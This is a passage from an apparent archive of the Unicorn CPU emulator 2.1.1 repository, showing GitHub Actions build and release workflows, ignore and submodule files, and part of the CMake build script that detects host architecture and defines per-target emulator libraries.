contains(matrix.config.arch, 'x86') shell: 'script -q -e -c "bash {0}"' run: | if [ ${{ matrix.config.arch }} == 'x64' ]; then sudo apt install -q -y libcmocka-dev ninja-build else export CFLAGS="-m32" LDFLAGS="-m32" LDFLAGS_STATIC="-m32" UNICORN_QEMU_FLAGS="--cpu=i386" sudo dpkg --add-architecture i386 sudo apt install -q -y lib32ncurses-dev lib32z1-dev lib32gcc-9-dev libc6-dev-i386 gcc-multilib \ libcmocka-dev:i386 libcmocka0:i386 libc6:i386 libgcc-s1:i386 ninja-build fi mkdir build mkdir instdir cmake \ -S . \ -B . \ -DCMAKE_BUILD_TYPE=${{ matrix.config.build_type }} \ -G "${{ matrix.config.generators }}" \ -DCMAKE_INSTALL_PREFIX:PATH=instdir \ -DBUILD_SHARED_LIBS=${{ matrix.config.shared }} cmake --build . --config ${{ matrix.config.build_type }} cmake --install . --strip ctest -VV -C ${{ matrix.config.build_type }} - name: '🚧 Linux ppc64le/aarch64 build' if: contains(matrix.config.arch, 'ppc64le') || contains(matrix.config.arch, 'aarch64') uses: uraimo/run-on-arch-action@v2 with: arch: ${{ matrix.config.arch }} distro: ${{ matrix.config.distro }} setup: | mkdir -p "${PWD}/instdir" dockerRunArgs: | --volume "${PWD}/instdir:/instdir" shell: /bin/sh install: | apt-get update -q -y apt-get install -q -y git cmake build-essential automake libcmocka-dev pkg-config ${{ matrix.compiler }} ninja-build run: | mkdir build cmake \ -S . \ -B . \ -DCMAKE_BUILD_TYPE=${{ matrix.config.build_type }} \ -G "${{ matrix.config.generators }}" \ -DCMAKE_INSTALL_PREFIX:PATH=/instdir cmake --build . --config ${{ matrix.config.build_type }} cmake --install . --strip ctest -VV -C ${{ matrix.config.build_type }} - name: '📦 Pack artifact' if: always() shell: bash working-directory: instdir run: | ls -laR ${{ matrix.config.archiver }} ../${{ matrix.config.artifact }} . ../test* - name: '📤 Upload artifact' if: always() uses: actions/upload-artifact@v4 with: path: ./${{ matrix.config.artifact }} name: ${{ matrix.config.artifact }}unicorn-2.1.1/.github/workflows/prerelease.yml000066400000000000000000000024051467524106700214540ustar00rootroot00000000000000on: push: tags: - 'rc*' workflow_dispatch: name: Upload Prerelease Assets jobs: build: name: Upload Release Assets runs-on: ubuntu-latest steps: - name: Checkout code uses: actions/checkout@v4 - name: Create Release id: create_release uses: actions/create-release@v1 env: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} with: tag_name: ${{ github.ref }} release_name: Release ${{ github.ref }} draft: true prerelease: true - name: create artifacts directory run: mkdir artifact working-directory: ./ - uses: dawidd6/action-download-artifact@v2 id: download-artifact with: workflow: build-uc2.yml workflow_conclusion: success branch: master path: artifact - name: Display structure of downloaded files run: ls -R working-directory: artifact - name: Upload Release Assets id: upload-release-assets uses: dwenegar/upload-release-assets@v1 env: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} with: release_id: ${{ steps.create_release.outputs.id }} assets_path: artifactunicorn-2.1.1/.github/workflows/release.yml000066400000000000000000000024021467524106700207420ustar00rootroot00000000000000on: push: tags: - 'v*' workflow_dispatch: name: Upload Release Assets jobs: build: name: Upload Release Assets runs-on: ubuntu-latest steps: - name: Checkout code uses: actions/checkout@v4 - name: Create Release id: create_release uses: actions/create-release@v1 env: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} with: tag_name: ${{ github.ref }} release_name: Release ${{ github.ref }} draft: true prerelease: false 
- name: create artifacts directory run: mkdir artifact working-directory: ./ - uses: dawidd6/action-download-artifact@v6 id: download-artifact with: workflow: build-uc2.yml workflow_conclusion: success branch: master path: artifact - name: Display structure of downloaded files run: ls -R working-directory: artifact - name: Upload Release Assets id: upload-release-assets uses: dwenegar/upload-release-assets@v1 env: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} with: release_id: ${{ steps.create_release.outputs.id }} assets_path: artifactunicorn-2.1.1/.github/workflows/zigbuild.yml000066400000000000000000000056711467524106700211460ustar00rootroot00000000000000name: Zig Build on: push: paths-ignore: - ".gitignore" - "docs/**" - "README" - "CREDITS.TXT" - "COPYING_GLIB" - "COPYING.LGPL2" - "AUTHORS.TXT" - "CHANGELOG" - "COPYING" pull_request: jobs: build-ubuntu: strategy: fail-fast: false matrix: runs-on: [ubuntu-latest] runs-on: ${{ matrix.runs-on }} steps: - uses: actions/checkout@v4 with: submodules: recursive fetch-depth: 0 - uses: goto-bus-stop/setup-zig@v2 with: version: 0.13.0 - uses: lukka/get-cmake@latest with: cmakeVersion: latest ninjaVersion: latest - name: CMake Build run: zig build cmake - name: Build Summary run: zig build --summary all -freference-trace build-macos: strategy: fail-fast: false matrix: runs-on: [macos-latest] runs-on: ${{ matrix.runs-on }} steps: - uses: actions/checkout@v4 with: submodules: recursive fetch-depth: 0 - uses: goto-bus-stop/setup-zig@v2 with: version: 0.13.0 - uses: lukka/get-cmake@latest with: cmakeVersion: latest ninjaVersion: latest # MacOS has a hard process limit that we will hit if we do a # parallel build, so disable parallel cmake build (manual # option set in `build.zig`) - name: CMake Build run: zig build -Dparallel=false cmake - name: Build Summary run: zig build --summary all -freference-trace # =================================================================== # zig-mingw: # runs-on: windows-latest # strategy: # fail-fast: false # matrix: # include: [{ msystem: CLANG64, arch: x86_64, prefix: /clang64 }, { msystem: CLANG32, arch: i686, prefix: /clang32 }, { msystem: CLANGARM64, arch: aarch64, prefix: /clangarm64 }] # steps: # - uses: actions/checkout@v4 # with: # path: temp # submodules: recursive # fetch-depth: 0 # - uses: goto-bus-stop/setup-zig@v2 # with: # version: master # - uses: msys2/setup-msys2@v2 # with: # msystem: ${{ matrix.msystem }} # path-type: inherit # location: D:\ # install: git mingw-w64-clang-${{ matrix.arch }}-cmake # update: true # - name: Move Checkout # run: | # Copy-Item -Path ".\temp" -Destination "C:\_" -Recurse # - name: Build Summary - ${{ matrix.arch }} # shell: msys2 {0} # run: | # cd /C/_ # zig build cmake # if [${{ matrix.config.arch }} == 'i686' ]; then # zig build --summary all -freference-trace -Dtarget=x86-windows # else # zig build --summary all -freference-trace -Dtarget=${{ matrix.arch }}-windows # fi unicorn-2.1.1/.gitignore000066400000000000000000000020231467524106700151710ustar00rootroot00000000000000.DS_Store *.swp *.d *.o *.a *.dSYM *.so *.so.* *.exe *.dll *.class *.jar *.gem *~ qemu/*-softmmu/ tags qemu/config-host.ld qemu/config.log qemu/config.status qemu/config-host.h qemu/config-host.h-timestamp qemu/config-host.mak libunicorn*.dll libunicorn*.so libunicorn*.dylib unicorn.pc unicorn.lib unicorn.dll unicorn.exp unicorn.def unicorn_*.lib unicorn_*.exp unicorn_*.dll *.tgz *.zip *.pyc _*.txt _*.diff tmp/ bindings/python/build/ bindings/python/dist/ bindings/python/src/ 
bindings/python/unicorn.egg-info/ bindings/python/unicorn/lib/ bindings/python/unicorn/include/ bindings/python/MANIFEST /target/ Cargo.lock config.log ################# ## Visual Studio ################# ## Ignore Visual Studio temporary files, build results, and ## files generated by popular Visual Studio add-ons. # vscode .vscode .vscode/ # User-specific files *.opensdf *.sdf *.suo *.user *.sln.docstates # Build results [Dd]ebug/ [Rr]elease/ x64/ Win32/ build/ build_* rust_build [Bb]in/ [Oo]bj/ packages/ cmocka/ zig-cache/ zig-out/ .cacheunicorn-2.1.1/.gitmodules000066400000000000000000000002301467524106700153540ustar00rootroot00000000000000[submodule "docs/Unicorn_Engine_Documentation"] path = docs/Unicorn_Engine_Documentation url = https://github.com/kabeor/Unicorn-Engine-Documentation unicorn-2.1.1/AUTHORS.TXT000066400000000000000000000001211467524106700147240ustar00rootroot00000000000000Nguyen Anh Quynh Dang Hoang Vu unicorn-2.1.1/CMakeLists.txt000066400000000000000000001372311467524106700157530ustar00rootroot00000000000000# CMake setup for Unicorn 2. # By Huitao Chen & Nguyen Anh Quynh, 2019-2020 cmake_minimum_required(VERSION 3.5) # Only required for MSVC, but we can't know the compiler at this point because we haven't # called enable_language() or project(), and if we did that it would lock in the old # policy. Setting these policies is harmless for non-MSVC though, so just enable them # always. if(CMAKE_VERSION VERSION_GREATER_EQUAL "3.15") # Set explicitly the policies we want rather than raising the base to the current # version. This prevents unintended behavior changes as CMake evolves and provides a # consistent experience across different CMake versions. # CMP0091: prevent msvcrt flags being added to default CMAKE__FLAGS_ cmake_policy(SET CMP0091 NEW) # CMP0092: prevent warning flags being added to default CMAKE__FLAGS for MSVC cmake_policy(SET CMP0092 NEW) endif() # Honor visibility properties for all target types. cmake_policy(SET CMP0063 NEW) option(ZIG_BUILD "Enable zig build" OFF) if(ZIG_BUILD) include(cmake/zig.cmake) endif() # Workaround to fix wrong compiler on macos. if(APPLE AND NOT CMAKE_C_COMPILER) set(CMAKE_C_COMPILER "/usr/bin/cc") endif() # Detect if unicorn is compiled as the top-level project set(PROJECT_IS_TOP_LEVEL OFF) if(CMAKE_CURRENT_SOURCE_DIR STREQUAL CMAKE_SOURCE_DIR) set(PROJECT_IS_TOP_LEVEL ON) # Enable folder support set_property(GLOBAL PROPERTY USE_FOLDERS ON) endif() project(unicorn C) # We depend on the availability of the CMAKE_MSVC_RUNTIME_LIBRARY, which is only # available in CMake 3.15 and above (see also the comments above in regards to policy # CMP0091). if(MSVC AND CMAKE_VERSION VERSION_LESS "3.15") message(FATAL_ERROR "Please update CMake to 3.15 or greater.") endif() # mainline qemu mostly just uses compiler default set(CMAKE_C_STANDARD 11) set(UNICORN_VERSION_MAJOR 2) set(UNICORN_VERSION_MINOR 1) set(UNICORN_VERSION_PATCH 1) include(cmake/bundle_static.cmake) # Even though we generate shared lib and static archive at the same time, we still support # using unicorn as a subdirectory so we have to respect BUILD_SHARED_LIBS. # # Also we would like users to link a native cmake target, instead of a custom target for better # compatability. 
option(BUILD_SHARED_LIBS "Build shared instead of static library" ${PROJECT_IS_TOP_LEVEL}) option(UNICORN_FUZZ "Enable fuzzing" OFF) option(UNICORN_LOGGING "Enable logging" OFF) option(UNICORN_BUILD_TESTS "Build unicorn tests" ${PROJECT_IS_TOP_LEVEL}) option(UNICORN_INSTALL "Enable unicorn installation" ${PROJECT_IS_TOP_LEVEL}) set(UNICORN_ARCH "x86;arm;aarch64;riscv;mips;sparc;m68k;ppc;s390x;tricore" CACHE STRING "Enabled unicorn architectures") option(UNICORN_TRACER "Trace unicorn execution" OFF) foreach(ARCH_LOOP ${UNICORN_ARCH}) string(TOUPPER "${ARCH_LOOP}" ARCH_LOOP) set(UNICORN_HAS_${ARCH_LOOP} TRUE) endforeach() if(MSVC) include_directories( ${CMAKE_CURRENT_SOURCE_DIR}/msvc ) else() include_directories( ${CMAKE_BINARY_DIR} ) endif() include_directories( glib_compat qemu qemu/include include qemu/tcg ) # QEMU logging facility if (UNICORN_LOGGING) add_compile_options(-DUNICORN_LOGGING) endif() # Some distributions on some rare architecures don't auto link atomic for us and # we do this manually by adding flags. set(ATOMIC_LINKAGE_FIX FALSE) if(MSVC) if(CMAKE_SIZEOF_VOID_P EQUAL 8) set(MSVC_FLAG -D__x86_64__) elseif(CMAKE_SIZEOF_VOID_P EQUAL 4) set(MSVC_FLAG -D__i386__) else() message(FATAL_ERROR "Neither WIN64 or WIN32!") endif() add_compile_options( -Dinline=__inline -D__func__=__FUNCTION__ -D_CRT_SECURE_NO_WARNINGS -DWIN32_LEAN_AND_MEAN ${MSVC_FLAG} /I${CMAKE_CURRENT_SOURCE_DIR}/qemu/tcg/i386 ) # Disable some warnings add_compile_options($<$:/wd4018>) add_compile_options($<$:/wd4098>) add_compile_options($<$:/wd4244>) add_compile_options($<$:/wd4267>) # handle msvcrt setting being passed in CMAKE_C_FLAGS if(CMAKE_C_FLAGS MATCHES "[/-]M[TD]d?") # ensure CMAKE_MSVC_RUNTIME_LIBRARY is not already defined if(DEFINED CMAKE_MSVC_RUNTIME_LIBRARY) message(FATAL_ERROR "please set the runtime library via either CMAKE_C_FLAGS or CMAKE_MSVC_RUNTIME_LIBRARY, not both") endif() if(CMAKE_C_FLAGS MATCHES "[/-]MTd") set(CMAKE_MSVC_RUNTIME_LIBRARY "MultiThreadedDebug") elseif(CMAKE_C_FLAGS MATCHES "[/-]MDd") set(CMAKE_MSVC_RUNTIME_LIBRARY "MultiThreadedDebugDLL") elseif(CMAKE_C_FLAGS MATCHES "[/-]MT") set(CMAKE_MSVC_RUNTIME_LIBRARY "MultiThreaded") elseif(CMAKE_C_FLAGS MATCHES "[/-]MD") set(CMAKE_MSVC_RUNTIME_LIBRARY "MultiThreadedDLL") endif() # prevent the arg from occurring more than once (not a big deal, just to keep tidy) string(REGEX REPLACE "[/-]M[TD]d?" 
"" CMAKE_C_FLAGS ${CMAKE_C_FLAGS}) endif() else() if(MINGW) execute_process(COMMAND ${CMAKE_C_COMPILER} -dumpmachine OUTPUT_VARIABLE UC_COMPILER_VERSION) string(FIND "${UC_COMPILER_VERSION}" "i686" UC_RET) if(${UC_RET} GREATER_EQUAL "0") set(UNICORN_TARGET_ARCH "i386") set(UNICORN_CFLAGS -m32 -static-libgcc) # Workaround for github action bugs set(CMAKE_EXE_LINKER_FLAGS "${CMAKE_EXE_LINKER_FLAGS} -m32") set(CMAKE_SHARED_LINKER_FLAGS "${CMAKE_SHARED_LINKER_FLAGS} -m32") else() set(UNICORN_TARGET_ARCH "i386") set(UNICORN_CFLAGS -m64 -mcx16) set(CMAKE_EXE_LINKER_FLAGS "${CMAKE_EXE_LINKER_FLAGS} -m64") set(CMAKE_SHARED_LINKER_FLAGS "${CMAKE_SHARED_LINKER_FLAGS} -m64") endif() elseif(ANDROID_ABI) string(FIND "${ANDROID_ABI}" "arm64" UC_RET) file(WRITE ${CMAKE_BINARY_DIR}/adb.sh "#!/bin/bash\n\n# Auto-generated by CMakeLists.txt\n\nadb shell mkdir -p /data/local/tmp/build\n") if(${UC_RET} GREATER_EQUAL "0") set(UNICORN_TARGET_ARCH "aarch64") else() string(FIND "${ANDROID_ABI}" "armeabi" UC_RET) if(${UC_RET} GREATER_EQUAL "0") set(UNICORN_TARGET_ARCH "arm") else() set(UNICORN_TARGET_ARCH "i386") endif() endif() else() execute_process(COMMAND ${CMAKE_C_COMPILER} -dM -E - INPUT_FILE /dev/null OUTPUT_VARIABLE UC_COMPILER_MACRO) while(TRUE) string(FIND "${UC_COMPILER_MACRO}" "__x86_64__" UC_RET) if(${UC_RET} GREATER_EQUAL "0") set(UNICORN_TARGET_ARCH "i386") string(FIND "${UC_COMPILER_MACRO}" "__ILP32__" UC_RET) if(${UC_RET} GREATER_EQUAL "0") set(UNICORN_CFLAGS -mx32) set(CMAKE_EXE_LINKER_FLAGS "${CMAKE_EXE_LINKER_FLAGS} -mx32") set(CMAKE_SHARED_LINKER_FLAGS "${CMAKE_SHARED_LINKER_FLAGS} -mx32") else() set(UNICORN_CFLAGS -m64 -mcx16) set(CMAKE_EXE_LINKER_FLAGS "${CMAKE_EXE_LINKER_FLAGS} -m64") set(CMAKE_SHARED_LINKER_FLAGS "${CMAKE_SHARED_LINKER_FLAGS} -m64") endif() break() endif() string(FIND "${UC_COMPILER_MACRO}" "__i386__" UC_RET) if(${UC_RET} GREATER_EQUAL "0") set(UNICORN_TARGET_ARCH "i386") break() endif() string(FIND "${UC_COMPILER_MACRO}" "__arm__" UC_RET) if(${UC_RET} GREATER_EQUAL "0") set(UNICORN_TARGET_ARCH "arm") set(ATOMIC_LINKAGE_FIX TRUE) break() endif() string(FIND "${UC_COMPILER_MACRO}" "__aarch64__" UC_RET) if(${UC_RET} GREATER_EQUAL "0") set(UNICORN_TARGET_ARCH "aarch64") break() endif() string(FIND "${UC_COMPILER_MACRO}" "__mips__" UC_RET) if(${UC_RET} GREATER_EQUAL "0") set(UNICORN_TARGET_ARCH "mips") set(ATOMIC_LINKAGE_FIX TRUE) break() endif() string(FIND "${UC_COMPILER_MACRO}" "__sparc__" UC_RET) if(${UC_RET} GREATER_EQUAL "0") set(UNICORN_TARGET_ARCH "sparc") set(ATOMIC_LINKAGE_FIX TRUE) break() endif() string(FIND "${UC_COMPILER_MACRO}" "__ia64__" UC_RET) if(${UC_RET} GREATER_EQUAL "0") set(UNICORN_TARGET_ARCH "ia64") break() endif() string(FIND "${UC_COMPILER_MACRO}" "_ARCH_PPC" UC_RET) if(${UC_RET} GREATER_EQUAL "0") set(UNICORN_TARGET_ARCH "ppc") set(ATOMIC_LINKAGE_FIX TRUE) break() endif() string(FIND "${UC_COMPILER_MACRO}" "__riscv" UC_RET) if(${UC_RET} GREATER_EQUAL "0") set(UNICORN_TARGET_ARCH "riscv") set(ATOMIC_LINKAGE_FIX TRUE) break() endif() string(FIND "${UC_COMPILER_MACRO}" "__s390__" UC_RET) if(${UC_RET} GREATER_EQUAL "0") set(UNICORN_TARGET_ARCH "s390") set(ATOMIC_LINKAGE_FIX TRUE) break() endif() string(FIND ${UC_COMPILER_MACRO} "__tricore__" UC_RET) if (${UC_RET} GREATER_EQUAL "0") set(UNICORN_TARGET_ARCH "tricore") break() endif() message(FATAL_ERROR "Unknown host compiler: ${CMAKE_C_COMPILER}.") endwhile(TRUE) endif() set(EXTRA_CFLAGS "--extra-cflags=") if(UNICORN_HAS_X86) set(EXTRA_CFLAGS "${EXTRA_CFLAGS}-DUNICORN_HAS_X86 ") endif() 
if(UNICORN_HAS_ARM) set(EXTRA_CFLAGS "${EXTRA_CFLAGS}-DUNICORN_HAS_ARM ") endif() if(UNICORN_HAS_AARCH64) set(EXTRA_CFLAGS "${EXTRA_CFLAGS}-DUNICORN_HAS_ARM64 ") endif() if(UNICORN_HAS_M68K) set(EXTRA_CFLAGS "${EXTRA_CFLAGS}-DUNICORN_HAS_M68K ") endif() if(UNICORN_HAS_MIPS) set(EXTRA_CFLAGS "${EXTRA_CFLAGS}-DUNICORN_HAS_MIPS -DUNICORN_HAS_MIPSEL -DUNICORN_HAS_MIPS64 -DUNICORN_HAS_MIPS64EL ") endif() if(UNICORN_HAS_SPARC) set(EXTRA_CFLAGS "${EXTRA_CFLAGS}-DUNICORN_HAS_SPARC ") endif() if(UNICORN_HAS_PPC) set(EXTRA_CFLAGS "${EXTRA_CFLAGS}-DUNICORN_HAS_PPC ") endif() if(UNICORN_HAS_RISCV) set(EXTRA_CFLAGS "${EXTRA_CFLAGS}-DUNICORN_HAS_RISCV ") endif() if (UNICORN_HAS_S390X) set (EXTRA_CFLAGS "${EXTRA_CFLAGS}-DUNICORN_HAS_S390X ") endif() if (UNICORN_HAS_TRICORE) set (EXTRA_CFLAGS "${EXTRA_CFLAGS}-DUNICORN_HAS_TRICORE ") endif() set(EXTRA_CFLAGS "${EXTRA_CFLAGS}-fPIC") if(ANDROID_ABI) set(EXTRA_CFLAGS "${EXTRA_CFLAGS} --target=${CMAKE_C_COMPILER_TARGET}") set(EXTRA_CFLAGS "${EXTRA_CFLAGS} --sysroot=${CMAKE_SYSROOT}") endif() if(UNICORN_FUZZ) set(EXTRA_CFLAGS "${EXTRA_CFLAGS} ${CMAKE_C_FLAGS}") endif() if(UNICORN_TRACER) set (EXTRA_CFLAGS "${EXTRA_CFLAGS} -DUNICORN_TRACER") endif() if (ATOMIC_LINKAGE_FIX) set (EXTRA_CFLAGS "${EXTRA_CFLAGS} -latomic") endif() if (CMAKE_OSX_SYSROOT) # https://github.com/unicorn-engine/unicorn/issues/1917 set (EXTRA_CFLAGS "${EXTRA_CFLAGS} -isysroot ${CMAKE_OSX_SYSROOT} ") endif() set(TARGET_LIST "--target-list=") if(UNICORN_HAS_X86) set(TARGET_LIST "${TARGET_LIST}x86_64-softmmu, ") endif() if(UNICORN_HAS_ARM) set(TARGET_LIST "${TARGET_LIST}arm-softmmu, ") endif() if(UNICORN_HAS_AARCH64) set(TARGET_LIST "${TARGET_LIST}aarch64-softmmu, ") endif() if(UNICORN_HAS_M68K) set(TARGET_LIST "${TARGET_LIST}m68k-softmmu, ") endif() if(UNICORN_HAS_MIPS) set(TARGET_LIST "${TARGET_LIST}mips-softmmu, mipsel-softmmu, mips64-softmmu, mips64el-softmmu, ") endif() if(UNICORN_HAS_SPARC) set(TARGET_LIST "${TARGET_LIST}sparc-softmmu, sparc64-softmmu, ") endif() if(UNICORN_HAS_PPC) set(TARGET_LIST "${TARGET_LIST}ppc-softmmu, ppc64-softmmu, ") endif() if(UNICORN_HAS_RISCV) set(TARGET_LIST "${TARGET_LIST}riscv32-softmmu, riscv64-softmmu, ") endif() if(UNICORN_HAS_S390X) set(TARGET_LIST "${TARGET_LIST}s390x-softmmu, ") endif() if (UNICORN_HAS_TRICORE) set (TARGET_LIST "${TARGET_LIST}tricore-softmmu, ") endif() set(TARGET_LIST "${TARGET_LIST} ") # GEN config-host.mak & target directories execute_process(COMMAND sh ${CMAKE_CURRENT_SOURCE_DIR}/qemu/configure --cc=${CMAKE_C_COMPILER} ${EXTRA_CFLAGS} ${TARGET_LIST} WORKING_DIRECTORY ${CMAKE_BINARY_DIR} ) execute_process(COMMAND sh ${CMAKE_CURRENT_SOURCE_DIR}/qemu/scripts/create_config INPUT_FILE ${CMAKE_BINARY_DIR}/config-host.mak OUTPUT_FILE ${CMAKE_BINARY_DIR}/config-host.h ) if(UNICORN_HAS_X86) execute_process(COMMAND sh ${CMAKE_CURRENT_SOURCE_DIR}/qemu/scripts/create_config INPUT_FILE ${CMAKE_BINARY_DIR}/x86_64-softmmu/config-target.mak OUTPUT_FILE ${CMAKE_BINARY_DIR}/x86_64-softmmu/config-target.h ) endif() if(UNICORN_HAS_ARM) execute_process(COMMAND sh ${CMAKE_CURRENT_SOURCE_DIR}/qemu/scripts/create_config INPUT_FILE ${CMAKE_BINARY_DIR}/arm-softmmu/config-target.mak OUTPUT_FILE ${CMAKE_BINARY_DIR}/arm-softmmu/config-target.h ) endif() if(UNICORN_HAS_AARCH64) execute_process(COMMAND sh ${CMAKE_CURRENT_SOURCE_DIR}/qemu/scripts/create_config INPUT_FILE ${CMAKE_BINARY_DIR}/aarch64-softmmu/config-target.mak OUTPUT_FILE ${CMAKE_BINARY_DIR}/aarch64-softmmu/config-target.h ) endif() if(UNICORN_HAS_M68K) execute_process(COMMAND sh 
${CMAKE_CURRENT_SOURCE_DIR}/qemu/scripts/create_config INPUT_FILE ${CMAKE_BINARY_DIR}/m68k-softmmu/config-target.mak OUTPUT_FILE ${CMAKE_BINARY_DIR}/m68k-softmmu/config-target.h ) endif() if(UNICORN_HAS_MIPS) execute_process(COMMAND sh ${CMAKE_CURRENT_SOURCE_DIR}/qemu/scripts/create_config INPUT_FILE ${CMAKE_BINARY_DIR}/mips-softmmu/config-target.mak OUTPUT_FILE ${CMAKE_BINARY_DIR}/mips-softmmu/config-target.h ) execute_process(COMMAND sh ${CMAKE_CURRENT_SOURCE_DIR}/qemu/scripts/create_config INPUT_FILE ${CMAKE_BINARY_DIR}/mipsel-softmmu/config-target.mak OUTPUT_FILE ${CMAKE_BINARY_DIR}/mipsel-softmmu/config-target.h ) execute_process(COMMAND sh ${CMAKE_CURRENT_SOURCE_DIR}/qemu/scripts/create_config INPUT_FILE ${CMAKE_BINARY_DIR}/mips64-softmmu/config-target.mak OUTPUT_FILE ${CMAKE_BINARY_DIR}/mips64-softmmu/config-target.h ) execute_process(COMMAND sh ${CMAKE_CURRENT_SOURCE_DIR}/qemu/scripts/create_config INPUT_FILE ${CMAKE_BINARY_DIR}/mips64el-softmmu/config-target.mak OUTPUT_FILE ${CMAKE_BINARY_DIR}/mips64el-softmmu/config-target.h ) endif() if(UNICORN_HAS_SPARC) execute_process(COMMAND sh ${CMAKE_CURRENT_SOURCE_DIR}/qemu/scripts/create_config INPUT_FILE ${CMAKE_BINARY_DIR}/sparc-softmmu/config-target.mak OUTPUT_FILE ${CMAKE_BINARY_DIR}/sparc-softmmu/config-target.h ) execute_process(COMMAND sh ${CMAKE_CURRENT_SOURCE_DIR}/qemu/scripts/create_config INPUT_FILE ${CMAKE_BINARY_DIR}/sparc64-softmmu/config-target.mak OUTPUT_FILE ${CMAKE_BINARY_DIR}/sparc64-softmmu/config-target.h ) endif() if(UNICORN_HAS_PPC) execute_process(COMMAND sh ${CMAKE_CURRENT_SOURCE_DIR}/qemu/scripts/create_config INPUT_FILE ${CMAKE_BINARY_DIR}/ppc-softmmu/config-target.mak OUTPUT_FILE ${CMAKE_BINARY_DIR}/ppc-softmmu/config-target.h ) execute_process(COMMAND sh ${CMAKE_CURRENT_SOURCE_DIR}/qemu/scripts/create_config INPUT_FILE ${CMAKE_BINARY_DIR}/ppc64-softmmu/config-target.mak OUTPUT_FILE ${CMAKE_BINARY_DIR}/ppc64-softmmu/config-target.h ) endif() if(UNICORN_HAS_RISCV) execute_process(COMMAND sh ${CMAKE_CURRENT_SOURCE_DIR}/qemu/scripts/create_config INPUT_FILE ${CMAKE_BINARY_DIR}/riscv32-softmmu/config-target.mak OUTPUT_FILE ${CMAKE_BINARY_DIR}/riscv32-softmmu/config-target.h ) execute_process(COMMAND sh ${CMAKE_CURRENT_SOURCE_DIR}/qemu/scripts/create_config INPUT_FILE ${CMAKE_BINARY_DIR}/riscv64-softmmu/config-target.mak OUTPUT_FILE ${CMAKE_BINARY_DIR}/riscv64-softmmu/config-target.h ) endif() if (UNICORN_HAS_S390X) execute_process(COMMAND sh ${CMAKE_CURRENT_SOURCE_DIR}/qemu/scripts/create_config INPUT_FILE ${CMAKE_BINARY_DIR}/s390x-softmmu/config-target.mak OUTPUT_FILE ${CMAKE_BINARY_DIR}/s390x-softmmu/config-target.h ) endif() if (UNICORN_HAS_TRICORE) execute_process(COMMAND sh ${CMAKE_CURRENT_SOURCE_DIR}/qemu/scripts/create_config INPUT_FILE ${CMAKE_BINARY_DIR}/tricore-softmmu/config-target.mak OUTPUT_FILE ${CMAKE_BINARY_DIR}/tricore-softmmu/config-target.h ) endif() add_compile_options( ${UNICORN_CFLAGS} -I${CMAKE_CURRENT_SOURCE_DIR}/qemu/tcg/${UNICORN_TARGET_ARCH} -D_GNU_SOURCE -D_FILE_OFFSET_BITS=64 -D_LARGEFILE_SOURCE -Wall -fPIC ) if (ATOMIC_LINKAGE_FIX) add_compile_options( -latomic ) endif() if(APPLE) # This warning is disabled by default for gcc and doesn't cause any bug. 
add_compile_options( -Wno-missing-braces ) endif() endif() set(UNICORN_ARCH_COMMON qemu/exec.c qemu/exec-vary.c qemu/softmmu/cpus.c qemu/softmmu/ioport.c qemu/softmmu/memory.c qemu/softmmu/memory_mapping.c qemu/fpu/softfloat.c qemu/tcg/optimize.c qemu/tcg/tcg.c qemu/tcg/tcg-op.c qemu/tcg/tcg-op-gvec.c qemu/tcg/tcg-op-vec.c qemu/accel/tcg/cpu-exec.c qemu/accel/tcg/cpu-exec-common.c qemu/accel/tcg/cputlb.c qemu/accel/tcg/tcg-all.c qemu/accel/tcg/tcg-runtime.c qemu/accel/tcg/tcg-runtime-gvec.c qemu/accel/tcg/translate-all.c qemu/accel/tcg/translator.c qemu/softmmu/unicorn_vtlb.c ) if(UNICORN_HAS_X86) add_library(x86_64-softmmu STATIC ${UNICORN_ARCH_COMMON} qemu/hw/i386/x86.c qemu/target/i386/arch_memory_mapping.c qemu/target/i386/bpt_helper.c qemu/target/i386/cc_helper.c qemu/target/i386/cpu.c qemu/target/i386/excp_helper.c qemu/target/i386/fpu_helper.c qemu/target/i386/helper.c qemu/target/i386/int_helper.c qemu/target/i386/machine.c qemu/target/i386/mem_helper.c qemu/target/i386/misc_helper.c qemu/target/i386/mpx_helper.c qemu/target/i386/seg_helper.c qemu/target/i386/smm_helper.c qemu/target/i386/svm_helper.c qemu/target/i386/translate.c qemu/target/i386/xsave_helper.c qemu/target/i386/unicorn.c ) if(MSVC) target_compile_options(x86_64-softmmu PRIVATE -DNEED_CPU_H /FIx86_64.h /I${CMAKE_CURRENT_SOURCE_DIR}/msvc/x86_64-softmmu /I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target/i386 ) else() target_compile_options(x86_64-softmmu PRIVATE -DNEED_CPU_H -include x86_64.h -I${CMAKE_BINARY_DIR}/x86_64-softmmu -I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target/i386 ) # Log and pow target_link_libraries(x86_64-softmmu PRIVATE m) endif() if(UNICORN_TRACER) target_compile_options(x86_64-softmmu PRIVATE -DUNICORN_TRACER) endif() endif() if(UNICORN_HAS_ARM) add_library(arm-softmmu STATIC ${UNICORN_ARCH_COMMON} qemu/target/arm/cpu.c qemu/target/arm/crypto_helper.c qemu/target/arm/debug_helper.c qemu/target/arm/helper.c qemu/target/arm/iwmmxt_helper.c qemu/target/arm/m_helper.c qemu/target/arm/neon_helper.c qemu/target/arm/op_helper.c qemu/target/arm/psci.c qemu/target/arm/tlb_helper.c qemu/target/arm/translate.c qemu/target/arm/vec_helper.c qemu/target/arm/vfp_helper.c qemu/target/arm/unicorn_arm.c ) if(MSVC) target_compile_options(arm-softmmu PRIVATE -DNEED_CPU_H /FIarm.h /I${CMAKE_CURRENT_SOURCE_DIR}/msvc/arm-softmmu /I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target/arm ) else() target_compile_options(arm-softmmu PRIVATE -DNEED_CPU_H -include arm.h -I${CMAKE_BINARY_DIR}/arm-softmmu -I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target/arm ) endif() if(UNICORN_TRACER) target_compile_options(arm-softmmu PRIVATE -DUNICORN_TRACER) endif() endif() if(UNICORN_HAS_AARCH64) add_library(aarch64-softmmu STATIC ${UNICORN_ARCH_COMMON} qemu/target/arm/cpu64.c qemu/target/arm/cpu.c qemu/target/arm/crypto_helper.c qemu/target/arm/debug_helper.c qemu/target/arm/helper-a64.c qemu/target/arm/helper.c qemu/target/arm/iwmmxt_helper.c qemu/target/arm/m_helper.c qemu/target/arm/neon_helper.c qemu/target/arm/op_helper.c qemu/target/arm/pauth_helper.c 